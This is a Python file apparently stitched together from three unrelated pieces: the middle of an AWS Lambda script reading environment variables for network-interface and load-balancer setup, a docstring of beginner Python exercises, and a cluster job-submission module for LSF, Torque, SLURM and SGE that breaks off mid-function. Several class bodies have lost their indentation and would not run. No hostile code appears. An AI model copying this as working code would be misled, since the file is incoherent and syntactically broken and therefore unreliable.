    # A missing variable is fatal — log and terminate.
    logger.error("Env variable 'ASG_NAME' isn't available")
    logger.debug(str(e))
    exit(0)
# Get Function Name
try:
    FUNC_NAME = os.environ['FUNC_NAME']
except Exception as e:
    logger.error("Env variable 'FUNC_NAME' isn't available")
    logger.debug(str(e))
    exit(0)
else:
    # Collect Environment variables for FUNC_NAME == 'CreateENI'
    if FUNC_NAME == 'CreateENI':
        DIAG_ENI_NAME = "-diag-eni"
        INSIDE_ENI_NAME = "-inside-eni"
        OUTSIDE_ENI_NAME = "-outside-eni"
        INSIDE_SUBNET_ID_LIST = []
        OUTSIDE_SUBNET_ID_LIST = []
        try:
            NO_OF_AZs = os.environ['NO_OF_AZs']
            logger.info("Number of availability zones: " + str(NO_OF_AZs))
        except Exception as e:
            logger.error("Env variable 'NO_OF_AZs' isn't available")
            logger.debug(str(e))
            exit(0)
        else:
            # The original contained three near-identical copies of this logic
            # for 1, 2 and 3 AZs; collapsed into one loop. Behavior unchanged:
            # only 1-3 AZs are supported, a missing subnet variable aborts
            # with the same log message, and the per-AZ module constants
            # (INSIDE_SUBNET_ID0, OUTSIDE_SUBNET_ID0, ...) are still defined
            # for any other module that imports them.
            if int(NO_OF_AZs) in (1, 2, 3):
                for _az in range(int(NO_OF_AZs)):
                    for _side, _target in (('INSIDE', INSIDE_SUBNET_ID_LIST),
                                           ('OUTSIDE', OUTSIDE_SUBNET_ID_LIST)):
                        _env_key = '%s_SUBNET%i' % (_side, _az)
                        try:
                            _subnet_id = os.environ[_env_key]
                        except Exception as e:
                            logger.error("Env variable '%s' isn't available" % _env_key)
                            logger.debug(str(e))
                            exit(0)
                        _target.append(_subnet_id)
                        # keep the individual constants available to importers
                        globals()['%s_SUBNET_ID%i' % (_side, _az)] = _subnet_id
                logger.info("List of subnet came from User Input: ")
                logger.info(INSIDE_SUBNET_ID_LIST)
                logger.info(OUTSIDE_SUBNET_ID_LIST)
            else:
                logger.error("Un-supported number of Availability zones")
                exit(0)
    # Collect Environment variables for FUNC_NAME == 'CreateENI' or FUNC_NAME == 'DeregTarget'
    if FUNC_NAME == 'CreateENI' or FUNC_NAME == 'DeregTarget':
        # Get Load Balancer ARN
        try:
            LB_ARN_OUTSIDE = os.environ['LB_ARN_OUTSIDE']
        except Exception as e:
            logger.error("Env variable 'LB_ARN_OUTSIDE' isn't available")
            logger.debug(str(e))
            exit(0)
        # User Input De-registration delay - 10 seconds
        try:
            DEREGISTRATION_DELAY = int(os.environ['LB_DEREGISTRATION_DELAY']) - 10
        except Exception as e:
            logger.error("Env variable 'LB_DEREGISTRATION_DELAY' isn't available")
            logger.debug(str(e))
            exit(0)
|
"""
1. Write a Python function that takes a sequence of numbers and determines whether all the numbers are different from each other.
2. Write a Python program to create all possible strings by using 'a', 'e', 'i', 'o', 'u'. Use the characters exactly once.
3. Write a Python program to remove and print every third number from a list of numbers until the list becomes empty.
4. Write a Python program to find unique triplets whose three elements give a sum of zero from an array of n integers.
5. Write a Python program to create all combinations of three digits.
6. Write a Python program to print a long text, convert the string to a list and print all the words and their frequencies.
7. Write a Python program to count the number of each character of a given text of a text file.
8. Write a Python program to get the top stories from Google news.
9. Write a Python program to get a list of locally installed Python modules.
10. Write a Python program to display some information about the OS where the script is running.
"""
|
import os
import sys
import random
import time
import pickle
import subprocess
import math
import pdb
import inspect
import types
import imp
import re
from string import Template
### define globals
rproc_nqstat_time = None  # timestamp of the most recent qstat/bjobs poll (cache key)
rproc_nqstat_output = None  # cached stdout of that poll, reused by rproc_still_running
MATLAB_RETURN_VALUE = None  # exit code set by rproc_rerun and reported by finish()
THIS_IS_A_RPROC_PROCESS = None  # truthy inside a worker; makes rproc_rerun exit instead of raise
rproc_wait_jobinfo = None  # jobinfo list targeted by rproc_kill('wait')
SCHEDULER = 'lsf'  # active batch system: 'lsf', 'torque', 'slurm' or 'sge'
# The SCHED_* values below are command strings/templates for the chosen
# scheduler; they are populated by _set_scheduler().
SCHED_KILL_JOB = None
SCHED_GET_JOB_RUNTIME = None
SCHED_JOB_ID_SPLIT = None
SCHED_GET_JOB_NUMBER = None
SCHED_SUBMIT_CMD = None
SCHED_MIN_OPTIONS = None
#### define jobinfo class
class Jobinfo():
def __init__(self):
self.ProcName = []
self.P1 = []
self.Mem = []
self.options = dict()
self.time = None
self.prefix = []
self.mat_fname = ''
self.data_fname = ''
self.result_fname = ''
self.m_fname = ''
self.log_fname = ''
self.qsublog_fname = ''
self.jobid = -1
self.submission_time = None
self.retries = 0
self.created = 0
self.time_of_loss = None
self.crashed_time = None
self.maxvmem = None
self.resubmit = False
self.time_req_resubmit = []
self.mem_req_resubmit = []
self.data_size = []
self.start_time = []
self.hard_time_limit = 1000000
self.callfile = None
### define Error class
class RprocRerun(Exception):
def __init__(self, string):
self.string = string
def __str__(self):
return repr(self.string)
def _set_scheduler():
    """Populate the SCHED_* command strings/templates for the batch system
    named by the global SCHEDULER ('lsf', 'torque', 'slurm' or 'sge').

    Each template is later filled via .substitute(); SCHED_JOB_ID_SPLIT is a
    Python expression template eval'ed on the submission-log contents.
    """
    global SCHEDULER, SCHED_KILL_JOB, SCHED_GET_JOB_RUNTIME
    global SCHED_JOB_ID_SPLIT, SCHED_GET_JOB_NUMBER, SCHED_SUBMIT_CMD
    global SCHED_MIN_OPTIONS
    if SCHEDULER == 'lsf':
        # LSF: bkill/bjobs/bsub command family
        SCHED_KILL_JOB = 'bkill'
        SCHED_GET_JOB_RUNTIME = Template('bjobs -o run_time ${jobid} | tail -n +2 | sed -e "s/ .*//g" ')
        SCHED_JOB_ID_SPLIT = Template('${var}.split(\'<\')[1].split(\'>\')')
        SCHED_GET_JOB_NUMBER = Template('bjobs -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
        SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | bsub -o ${qsub_log} -e ${qsub_log} ${options} -J ${name} >> ${log} 2>&1')
        SCHED_MIN_OPTIONS = Template('-n ${cores} -M ${mem} -R "rusage[mem=${coremem}]" -W ${time}')
    elif SCHEDULER == 'torque':
        # Torque/PBS: qdel/qstat/qsub command family
        SCHED_KILL_JOB = 'qdel'
        SCHED_GET_JOB_RUNTIME = Template('qstat -f ${jobid} | grep resources_used.walltime | sed -e "s/.*= //g"')
        SCHED_JOB_ID_SPLIT = Template('${var}.split(\'.\')')
        SCHED_GET_JOB_NUMBER = Template('qstat -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
        SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | qsub -o ${qsub_log} -j oe -r y ${options} -N ${name} >> ${log} 2>&1')
        SCHED_MIN_OPTIONS = Template('-l nodes=1:ppn=${cores} -l mem=${mem}mb,vmem=${mem}mb,pmem=${mem}mb -l walltime=${time}')
    elif SCHEDULER == 'slurm':
        # NOTE(review): the slurm branch reuses qsub/qstat-style commands and
        # is marked TODO in several places — it looks unfinished; verify
        # before relying on it.
        SCHED_KILL_JOB = 'qdel'
        SCHED_GET_JOB_RUNTIME = None #TODO
        SCHED_JOB_ID_SPLIT = Template('${var}.split(\'.\')')
        SCHED_GET_JOB_NUMBER = Template('qstat -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
        SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | qsub -o ${qsub_log} -j y -r y ${options} -N ${name} >> ${log} 2>&1') # TODO check this
        SCHED_MIN_OPTIONS = Template(' -l h_vmem=${mem}M -l s_vmem=${mem}M -l h_cpu=${time}') # TODO check this
    elif SCHEDULER == 'sge':
        # SGE: qdel/qstat/qsub with -soft/-hard resource requests
        SCHED_KILL_JOB = 'qdel'
        SCHED_GET_JOB_RUNTIME = None #TODO
        SCHED_JOB_ID_SPLIT = Template('${var}.split(\'.\')')
        SCHED_GET_JOB_NUMBER = Template('qstat -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
        SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | qsub -o ${qsub_log} -j y -r y ${options} -N ${name} >> ${log} 2>&1')
        SCHED_MIN_OPTIONS = Template(' -l h_vmem=${mem}M -l s_vmem=${mem}M -soft -l h_cpu=${time} -hard ')
def rproc(ProcName, P1, Mem=None, options=None, runtime=None, callfile=None, resubmission=False):
    """Pickle a call to ``ProcName(P1)`` and submit it to the batch scheduler.

    Parameters
    ----------
    ProcName : str
        Name of the function to run; must be resolvable in the caller's
        local or global scope unless `callfile` is given.
    P1 : object
        Single picklable argument passed to the function.
    Mem : int, optional
        Memory request in MB (default 300, floored at 100).
    options : dict, optional
        Scheduler and bookkeeping options; missing keys get defaults below.
    runtime : int, optional
        Runtime request in minutes (default 24).
    callfile : tuple(module_name, file_path), optional
        Where ProcName is defined; auto-detected from the caller if None.
    resubmission : bool
        True when called from rproc_resubmit; skips re-collecting imports.

    Returns
    -------
    Jobinfo or None
        Bookkeeping record of the submitted/started job, or None when
        ProcName cannot be located.
    """
    global SCHED_JOB_ID_SPLIT, SCHED_GET_JOB_NUMBER, SCHED_SUBMIT_CMD
    global SCHED_MIN_OPTIONS
    _set_scheduler()
    if callfile is None:
        ### check if ProcName is defined in calling function
        callframe = sys._getframe(1)
        if not ProcName in callframe.f_locals:
            if not ProcName in callframe.f_globals:
                print('ERROR: Could find no definition for %s in local or global context of calling function. Use kword callfile to specify file where %s is defined. Use the relative path to the location of the calling function!' % (ProcName, ProcName), file=sys.stderr)
                return
            else:
                callfile = (callframe.f_globals[ProcName].__module__, inspect.getfile(callframe.f_globals[ProcName]))
        else:
            callfile = (callframe.f_locals[ProcName].__module__, inspect.getfile(callframe.f_locals[ProcName]))
    if runtime is None:
        runtime = 24
    if Mem is None:
        Mem = 300
    if Mem < 100:
        print('WARNING: You specified to allocate less than 100Mb memory for your job. This might not be enough to start. Re-setting to 100Mb', file=sys.stderr)
        Mem = 100
    if options is None:
        options = dict()
    ### get module list of caller to re-create environment
    if not 'imports' in options:
        options['imports'] = dict()
    if not resubmission:
        callframe = sys._getframe(1)
        for l in callframe.f_globals:
            if (len(l) < 2 or l[:2] != '__'):
                if isinstance(callframe.f_globals[l], types.ModuleType):
                    if not l in options['imports']:
                        # NOTE(review): the `imp` module is removed in
                        # Python >= 3.12; this will need importlib eventually.
                        if imp.is_builtin(callframe.f_globals[l].__name__) != 0:
                            options['imports'][l] = (callframe.f_globals[l].__name__, 'builtin')
                        else:
                            options['imports'][l] = (callframe.f_globals[l].__name__, callframe.f_globals[l].__file__)
    if not callfile[0] in options['imports']:
        options['imports'][callfile[0]] = callfile
    use_reservation = False
    ### TODO this is only relevant for SGE
    if 'ncpus' in options and options['ncpus'] > 1:
        use_reservation = True
    ### fill in defaults for all bookkeeping options not provided by the caller
    defaults = {'verbosity': True,
                'maxjobs': 400,  # 5000
                'waitonfull': True,
                'immediately': False,
                'immediately_bg': False,
                'submit_now': True,
                'nicetohave': False,
                'ncpus': 1}
    for _key, _value in defaults.items():
        options.setdefault(_key, _value)
    if not 'start_dir' in options:
        dirctry = os.getcwd()
    else:
        dirctry = options['start_dir']
    if not 'log_dir' in options:
        log_dir = os.path.join(dirctry, 'tmp_spl_parallel')
    else:
        log_dir = options['log_dir']
    if not 'resubmit' in options:
        options['resubmit'] = False
        options['time_req_resubmit'] = []
        options['mem_req_resubmit'] = []
    if not 'data_size' in options:
        options['data_size'] = []
    if not 'hard_time_limit' in options:
        options['hard_time_limit'] = 1000000
    env_str = ''
    if 'environment' in options:
        env_str = 'source activate %s; ' % options['environment']
    jobinfo = rproc_empty()
    jobinfo.ProcName = ProcName
    jobinfo.P1 = P1
    jobinfo.Mem = Mem
    jobinfo.options = options
    jobinfo.time = runtime
    jobinfo.created = True
    jobinfo.resubmit = options['resubmit']
    jobinfo.mem_req_resubmit = options['mem_req_resubmit']
    jobinfo.time_req_resubmit = options['time_req_resubmit']
    jobinfo.data_size = options['data_size']
    jobinfo.hard_time_limit = options['hard_time_limit']
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    assert os.path.exists(log_dir)
    ### assembly option string
    if use_reservation:
        option_str = ' -R y'
    else:
        option_str = ''
    option_str += SCHED_MIN_OPTIONS.substitute(cores=str(options['ncpus']), mem=str(Mem), coremem=str(math.ceil(Mem / float(options['ncpus']))), time=str(max(60, runtime)))
    if 'hold' in options:
        if options['hold']:
            option_str += ' -h u'
    if 'queue' in options:
        option_str += ' -q "%s" ' % options['queue']
    if 'nicetohave' in options and options['nicetohave']:
        option_str += ' -l nicetohave=1'
    if 'priority' in options:
        option_str += ' -p %i' % options['priority']
    if 'express' in options and options['express']:
        option_str += ' -l express'
    if 'hostname' in options:
        # BUG FIX: the original appended '%s -l hostname=%s' % (option_str, ...),
        # which duplicated every option collected so far in the string.
        option_str += ' -l hostname=%s' % options['hostname']
    ### TODO make this configurable
    # use same pthon that the one it was called with
    #bin_str = sys.executable
    bin_str = 'spladder pyproc'
    ### request cplex license
    if 'cplex' in options and options['cplex']:
        option_str += ' -l cplex=1'
    if 'identifier' in options:
        identifier = options['identifier']
    else:
        identifier = 'RP'

    def _job_file_names(pfx):
        # derive the pickle/result/script file names for a given job prefix
        return (os.path.join(log_dir, '%s.pickle' % pfx),
                os.path.join(log_dir, '%s_data.pickle' % pfx),
                os.path.join(log_dir, '%s_result.pickle' % pfx),
                os.path.join(log_dir, '%s.sh' % pfx))

    cc = random.randint(0, 100000)
    prefix = '%s%i-%1.10f' % (identifier, cc, time.time())
    (mat_fname, data_fname, result_fname, m_fname) = _job_file_names(prefix)
    ### re-roll until the prefix is unique within log_dir
    while os.path.exists(mat_fname) or os.path.exists(result_fname) or os.path.exists(m_fname):
        cc = random.randint(0, 100000)
        prefix = '%s%i-%1.10f' % (identifier, cc, time.time())
        (mat_fname, data_fname, result_fname, m_fname) = _job_file_names(prefix)
    if 'log_fname' in options:
        log_fname = options['log_fname']
    else:
        log_fname = os.path.join(log_dir, '%s_%s.rproc' % (prefix, time.strftime('%d-%b-%Y_%H_%M')))
    qsublog_fname = '%s.qsubout' % log_fname
    jobinfo.prefix = prefix
    jobinfo.mat_fname = mat_fname
    jobinfo.data_fname = data_fname
    jobinfo.result_fname = result_fname
    jobinfo.m_fname = m_fname
    jobinfo.log_fname = log_fname
    jobinfo.qsublog_fname = qsublog_fname
    jobinfo.callfile = callfile
    ### save the call information
    pickle.dump((ProcName, dirctry, options, callfile), open(mat_fname, 'wb'), -1)
    pickle.dump(P1, open(data_fname, 'wb'), -1)
    evalstring = '%s %s %s' % (bin_str, mat_fname, data_fname)
    evalstring = 'cd %s;%s %s; exit' % (dirctry, env_str, evalstring)
    fd = open(m_fname, 'w')
    print('%s' % evalstring, file=fd)
    fd.close()
    if 'envstr' in options:
        envstr = options['envstr']
        if len(envstr) > 0:
            envstr += ';'
    else:
        envstr = ''
    if options['immediately']:
        callstr = '%s bash %s >> %s' % (envstr, m_fname, log_fname)
    elif options['immediately_bg']:
        callstr = '%s bash %s >> %s &' % (envstr, m_fname, log_fname)
    else:
        callstr = SCHED_SUBMIT_CMD.substitute(env=envstr, script=m_fname, log=log_fname, qsub_log=qsublog_fname, options=option_str, name=prefix)
    # wait until we are allowed to submit again, i.e. #jobs < maxjobs
    if not options['immediately'] and not options['immediately_bg'] and options['waitonfull']:
        while True:
            try:
                num_queued = int(subprocess.check_output(SCHED_GET_JOB_NUMBER.substitute(user=os.environ['USER']), shell=True).decode('utf-8').strip())
            except:
                print('WARNING: could not determine how many jobs are scheduled', file=sys.stderr)
                break
            # keep 50 spare jobs if multiple rprocs are scheduling...
            if (num_queued < options['maxjobs']):
                break
            else:
                if options['verbosity']:
                    print('queue full, sleeping 60 seconds (%i/%i)' % (num_queued, options['maxjobs']), file=sys.stdout)
                time.sleep(60)
    if options['submit_now']:
        if options['immediately'] and options['verbosity']:
            print('immediatedly starting job on local machine', file=sys.stdout)
        if options['immediately_bg'] and options['verbosity']:
            print('immediatedly starting job on local machine in background', file=sys.stdout)
        if options['immediately_bg']:
            # BUG FIX: the original parsed `uptime` once, then sat in an
            # inner `while hit is None` loop that never refreshed its input
            # (an infinite loop whenever 'average:' was missing) and also
            # evaluated a discarded float() that could raise AttributeError.
            # Re-run uptime on every iteration instead.
            while True:
                str_ = subprocess.check_output('uptime').decode('utf-8').strip()
                hit = re.search('average:', str_)
                if hit is None:
                    time.sleep(1)
                    continue
                cpu_load = float(str_[hit.start() + 8:].split(',')[0])
                if cpu_load > 13:
                    if options['verbosity']:
                        print('load too high: %1.2f' % cpu_load)
                    time.sleep(10)
                else:
                    break
            time.sleep(2)
        # feed the submission command line to bash via a pipe
        p1 = subprocess.Popen(['echo', callstr], stdout=subprocess.PIPE)
        p2 = subprocess.Popen(['bash'], stdin=p1.stdout, stdout=subprocess.PIPE)
        p2.communicate()
        ret = p2.returncode
        if ret != 0:
            print('submission failed:\n\tsubmission string: %s\n\treturn code: %i' % (callstr, ret), file=sys.stderr)
        jobinfo.submission_time = time.time()
        p1.communicate()
        ### grab job ID from submission log file
        if not options['immediately'] and not options['immediately_bg']:
            fd = open(log_fname, 'r')
            jobinfo.jobid = -1
            if fd:
                s = fd.read().strip()
                # NOTE(review): eval of a template-built expression on the
                # submission log; only safe because SCHED_JOB_ID_SPLIT is
                # defined module-locally.
                items = eval(SCHED_JOB_ID_SPLIT.substitute(var='s'))
                try:
                    jobinfo.jobid = int(items[0])
                except:
                    print(callstr, file=sys.stderr)
                    print('ERROR: submission failed: %s' % s, file=sys.stderr)
                    sys.exit(1)
                fd.close()
                rproc_register('submit', jobinfo)
            else:
                print('%s does not exist' % log_fname, file=sys.stderr)
        else:
            jobinfo.jobid = 0
    else:
        jobinfo.jobid = 0
    return jobinfo
def finish():
    """Report the global MATLAB_RETURN_VALUE and, if MATLAB_RETURN_FILE is
    set in the environment, write the exit code into that file."""
    print('rproc finishing')
    global MATLAB_RETURN_VALUE
    if MATLAB_RETURN_VALUE is not None:
        print('exit code %i' % MATLAB_RETURN_VALUE)
        try:
            rf = os.environ['MATLAB_RETURN_FILE']
            # BUG FIX: the original used MATLAB's fopen/fclose (NameError in
            # Python) and indexed the integer return value with [0]; write
            # the plain integer with a context manager instead.
            with open(rf, 'w+') as fd:
                print('%i' % MATLAB_RETURN_VALUE, file=fd)
        except KeyError:
            print('WARNING: environment MATLAB_RETURN_FILE not defined', file=sys.stderr)
def rproc_clean_register():
    """Cross-check ~/tmp/rproc.log against the scheduler queue and warn on
    stderr about jobs that are still running while their parent job is not."""
    fname = os.path.join(os.environ['HOME'], 'tmp', 'rproc.log')
    jobids = []
    parent_jobids = []
    # BUG FIX: running_jobids was appended to below without ever being
    # initialized, causing a NameError on first use.
    running_jobids = []
    # parse the rproc log: keep rows where both jobid columns look numeric
    with open(fname, 'r') as fd:
        for line in fd:
            if len(line.strip()) == 0:
                continue
            items = line.split()
            if len(items) < 4:
                continue
            if len(items[0]) == 0:
                continue
            if len(items[3]) == 0:
                continue
            if items[0][0] >= '0' and items[0][0] <= '9' and ((items[3][0] >= '0' and items[3][0] <= '9') or items[3][0] == '-'):
                jobids.append(int(items[0]))
                parent_jobids.append(int(items[3]))
    # collect the ids of jobs currently known to the scheduler
    text = subprocess.check_output('qstat').decode('utf-8').strip()
    for line in text.split('\n'):
        items = line.split(' ')
        if items[0][0] >= '0' and items[0][0] <= '9':
            running_jobids.append(int(items[0]))
    idx = [i for i in range(len(jobids)) if jobids[i] in running_jobids]
    for i in range(len(idx)):
        if not parent_jobids[idx[i]] in running_jobids and parent_jobids[idx[i]] != -1:
            print('job %i is still running, but the parent job %i not' % (jobids[idx[i]], parent_jobids[idx[i]]), file=sys.stderr)
def rproc_cleanup(jobinfo):
    """Remove every temporary file belonging to each job and log the cleanup."""
    for job in jobinfo:
        command = 'rm -f %s %s %s %s %s %s' % (job.mat_fname, job.result_fname,
                                               job.m_fname, job.log_fname,
                                               job.qsublog_fname, job.data_fname)
        subprocess.call(command.split(' '))
        rproc_register('cleanup', job)
def rproc_cmd(unix_cmd, jobinfo):
    """Run ``unix_cmd <jobid>`` for every job with a real scheduler id.

    BUG FIX: the original called len() on the integer jobid (TypeError) and
    passed the int itself in the subprocess argv; compare numerically and
    stringify the id instead. Jobs with jobid 0 (local) or -1 (unsubmitted)
    are skipped.
    """
    for job in jobinfo:
        if job.jobid > 0:
            subprocess.call([unix_cmd, str(job.jobid)])
def rproc_create(ProcName, P1, Mem=100, options=None, runtime=144000):
    """Create a Jobinfo record without submitting it.

    runtime is in minutes, Mem in MB; retries is set to -1 to mark the job
    as never submitted.
    """
    # BUG FIX: `options` used a mutable (and wrongly typed) default `[]`:
    # mutable defaults are shared between calls, and rproc() treats the
    # options as a dict. Default to a fresh dict instead.
    if options is None:
        options = dict()
    jobinfo = rproc_empty()
    jobinfo.ProcName = ProcName
    jobinfo.P1 = P1
    jobinfo.Mem = Mem
    jobinfo.options = options
    jobinfo.time = runtime
    jobinfo.created = True
    jobinfo.retries = -1
    return jobinfo
def rproc_empty(N=None):
    """Return a fresh Jobinfo (N is None or <= 1) or a list of N Jobinfos."""
    if N is None:
        N = 1
    if N > 1:
        return [Jobinfo() for _ in range(N)]
    return Jobinfo()
def rproc_finished(jobinfo):
    """Return True once the job's result file exists; registers completion.

    Unsubmitted jobs (jobid == -1) are never considered finished.
    """
    if jobinfo.jobid == -1:
        return False
    if not os.path.exists(jobinfo.result_fname):
        return False
    rproc_register('finished', jobinfo)
    return True
def rproc_kill(jobinfo):
    """Kill the given job(s) through the scheduler and register the kill.

    Passing the string 'wait' targets the global rproc_wait_jobinfo list.
    """
    global SCHED_KILL_JOB
    if jobinfo == 'wait':
        global rproc_wait_jobinfo
        jobinfo = rproc_wait_jobinfo
    for job in jobinfo:
        # BUG FIX: the original called len() on the integer jobid (TypeError)
        # and passed several positional strings to subprocess.call — including
        # a '2> /dev/null' shell redirect that only works through a shell.
        # Build a proper argv list and silence stderr via DEVNULL instead.
        if job.jobid > 0:
            subprocess.call([SCHED_KILL_JOB, str(job.jobid)],
                            stderr=subprocess.DEVNULL)
            rproc_register('kill', job)
def rproc_reached_timelimit(jobinfo):
    """Return (exceeded, walltime_seconds) for a submitted job.

    (False, -1) is returned whenever the runtime cannot be determined or
    fails the sanity check.
    """
    global SCHED_GET_JOB_RUNTIME
    query = SCHED_GET_JOB_RUNTIME.substitute(jobid=jobinfo.jobid)
    output = subprocess.check_output(query, shell=True).decode('utf-8')
    ## TODO use save Popen for pipeline
    if 'error' in output:
        return (False, -1)
    try:
        jobwalltime = split_walltime(output.strip())  # get time in seconds
    except Exception:
        return (False, -1)
    # sanity check: reject non-positive or absurdly large walltimes
    if not (0 < jobwalltime < 36000000):
        print('WARNING: invalid output from qacct', file=sys.stderr)
        return (False, -1)
    return (jobwalltime > jobinfo.time * 60, jobwalltime)
def rproc_register(action, jobinfo):
    """Append one tab-separated line describing `action` on `jobinfo` to
    ~/tmp/pyproc.log, writing a header line on first use."""
    try:
        this_jobid = int(os.environ['JOB_ID'])
    except:
        this_jobid = -1
    log_path = os.path.join(os.environ['HOME'], 'tmp', 'pyproc.log')
    if not os.path.exists(log_path):
        with open(log_path, 'a+') as fd:
            print('# prefix\taction\tparent jobid\tjobid\tfunction\ttime', file=fd)
    with open(log_path, 'a+') as fd:
        print('%i\t%s\t%s\t%i\t%s\t%s' % (jobinfo.jobid, jobinfo.prefix, action,
                                          this_jobid, jobinfo.ProcName,
                                          time.asctime()), file=fd)
def rproc_rerun(mess=''):
    """Request a rerun: inside an rproc worker process exit with code 99;
    otherwise raise RprocRerun carrying `mess`."""
    global MATLAB_RETURN_VALUE
    MATLAB_RETURN_VALUE = 99
    global THIS_IS_A_RPROC_PROCESS
    if THIS_IS_A_RPROC_PROCESS is not None and THIS_IS_A_RPROC_PROCESS == 1:
        # BUG FIX: `sys.exit` without parentheses was a bare attribute
        # access — a no-op that let the function fall through.
        sys.exit()
    else:
        raise RprocRerun(mess)
def rproc_resubmit(jobinfo, force=True):
    """Resubmit a lost/failed job unless it is still running.

    Accepts a single Jobinfo or a list (handled recursively); returns the
    updated record(s). At most 3 retries are attempted.
    """
    if jobinfo is None:
        return jobinfo
    elif isinstance(jobinfo, list):
        jobinfo2 = jobinfo
        for i in range(len(jobinfo)):
            jobinfo2[i] = rproc_resubmit(jobinfo[i])
        return jobinfo2
    if (jobinfo.retries >= 0) and (rproc_time_since_submission(jobinfo) < 1):
        # submitted less than a minute ago — do not resubmit yet
        return jobinfo
    if jobinfo.retries >= 3:
        if jobinfo.options['verbosity'] >= 0:
            print('Warning: job has already been submitted %i times' % jobinfo.retries, file=sys.stderr)
        if jobinfo.options['verbosity'] > 0:
            print('check file %s' % jobinfo.log_fname)
        return jobinfo
    if (jobinfo.retries >= 0):
        (still_running, qstat_line, start_time, status) = rproc_still_running(jobinfo)
        if still_running:
            if jobinfo.options['verbosity'] > 0:
                print('.', end=' ', file=sys.stdout)
            jobinfo2 = jobinfo
            jobinfo2.time_of_loss = None
            return jobinfo2
    if jobinfo.time_of_loss is None:
        jobinfo.time_of_loss = time.time()
    # more than a minute lost?
    # BUG FIX: the original computed (time_of_loss - time.time() / 60), which
    # divides only the current timestamp by 60 and has the operands reversed;
    # measure the elapsed minutes since the job was lost instead.
    if not force and ((time.time() - jobinfo.time_of_loss) / 60 < 1):
        jobinfo2 = jobinfo
        return jobinfo2
    jobinfo2 = rproc(jobinfo.ProcName, jobinfo.P1, jobinfo.Mem, jobinfo.options, jobinfo.time, jobinfo.callfile, resubmission=True)
    if jobinfo.jobid != -1:
        # increase only, if it has not been resubmitted before
        jobinfo2.retries = jobinfo.retries + 1
    return jobinfo2
def rproc_result(jobinfo, read_attempts=None):
    """Block until the job's result pickle exists, then return (retval1, retval2).

    Polls every 10 seconds; raises an Exception once `read_attempts`
    unsuccessful waits have elapsed (never, when read_attempts is None).
    """
    att = 1
    while not os.path.exists(jobinfo.result_fname):
        print('Job not finished yet. Waiting for result file to appear.', file=sys.stdout)
        if read_attempts is not None and att > read_attempts:
            # BUG FIX: `error(...)` was an untranslated MATLAB call
            # (NameError); raise a real exception with the same message.
            raise Exception('Unable to load result from %s' % jobinfo.result_fname)
        time.sleep(10)
        att += 1
    # BUG FIX: close the result file after unpickling (was leaked before)
    with open(jobinfo.result_fname, 'rb') as fd:
        (retval1, retval2) = pickle.load(fd)
    return (retval1, retval2)
def rproc_still_running(jobinfo):
    """Return (still_running, line, start_time, status) for a job.

    Queries the scheduler's queue listing (cached in module globals to avoid
    hammering qstat/bjobs), searches for the job's id in the output, and maps
    the scheduler status column through get_status/check_status.
    """
    global SCHEDULER
    # pick the queue-listing command for the active scheduler
    if SCHEDULER == 'torque':
        qstat_command = ['qstat', '-u', os.environ['USER']]
    elif SCHEDULER == 'sge':
        qstat_command = ['qstat', '-u', os.environ['USER']]
    elif SCHEDULER == 'lsf':
        qstat_command = ['bjobs', '-u', os.environ['USER']]
    elif SCHEDULER == 'slurm':
        qstat_command = ['qstat', '-u', os.environ['USER']]
    status = 0
    still_running = 0
    global rproc_nqstat_output
    global rproc_nqstat_time
    start_time = []
    if jobinfo.jobid == 0:
        # jobid 0 means the job runs locally in the background; fall back to
        # checking for the result file instead of the scheduler queue
        still_running = not rproc_finished(jobinfo)
        line = 'local job %s is still running: %s\n' % (jobinfo.prefix, jobinfo.log_fname)
        return (still_running, line, start_time, status)
    curtime = time.time()
    # NOTE(review): 0.5e-4 seconds (~50 microseconds) is a suspiciously short
    # cache window — a larger value (e.g. 0.5 s or more) was probably intended.
    if rproc_nqstat_time is None or (curtime - rproc_nqstat_time > 0.5e-4):
        try:
            text = subprocess.check_output(qstat_command).decode('utf-8')
            rproc_nqstat_output = text
            rproc_nqstat_time = curtime
        except subprocess.CalledProcessError as e:
            # returncode 130 corresponds to termination via Ctrl-C (SIGINT)
            if e.returncode == 130:
                print('rproc_still_running interupted by user', file=sys.stderr)
                status = -1
                line = ''
                start_time = ''
            print('WARNING: qstat failed', file=sys.stderr)
            text = ''
    else:
        # reuse the cached queue listing
        text = rproc_nqstat_output
    for line in text.strip().split('\n'):
        if len(line) > 0:
            # collapse runs of spaces so the column split is stable
            items = re.sub(r' +', ' ', line).split(' ')
            if not os.environ['USER'] in items:
                continue
            for j in range(len(items)): #assume that first non-empty item is the jobid
                if len(items[j]) > 0:
                    # strip array-job brackets and any '.host' suffix
                    p = int(items[j].split('.')[0].strip('[]'))
                    if p == jobinfo.jobid:
                        still_running = 1
                        status = get_status(items)
                        still_running = check_status(status)
                        if len(jobinfo.start_time) == 0 and status == 'r':
                            start_time = time.time()
                        else:
                            start_time = jobinfo.start_time
                        return (still_running, line, start_time, status)
                    # NOTE(review): this break is only reached when the first
                    # non-empty item is a different jobid; it stops scanning
                    # the remaining columns of this line by design(?)
                    break
    line = []
    return (still_running, line, start_time, status)
def get_status(items):
    """Extract the scheduler-reported job state from a split status line.

    items -- fields of one qstat/bjobs output line (may contain empty strings).
    Returns the raw status token, or '' if it cannot be located.
    """
    # status = get_status(items)
    global SCHEDULER
    # SCHED_STATUS_IDX: 1-based position of the status field among the
    # *non-empty* fields, per scheduler backend
    if SCHEDULER == 'torque':
        status_idx = 10
    elif SCHEDULER == 'sge':
        status_idx = None  # no fixed status column for sge here
    elif SCHEDULER == 'lsf':
        status_idx = 2
    elif SCHEDULER == 'slurm':
        status_idx = 5
    status = ''
    if status_idx is None:
        return status
    num = 0
    for j in range(len(items)):
        if len(items[j]) > 0:
            num += 1
            # BUG FIX: position was hard-coded to 10 (the torque value),
            # silently ignoring status_idx for lsf (2) and slurm (5)
            if num == status_idx:
                status = items[j]
                break
    return status
def check_status(status):
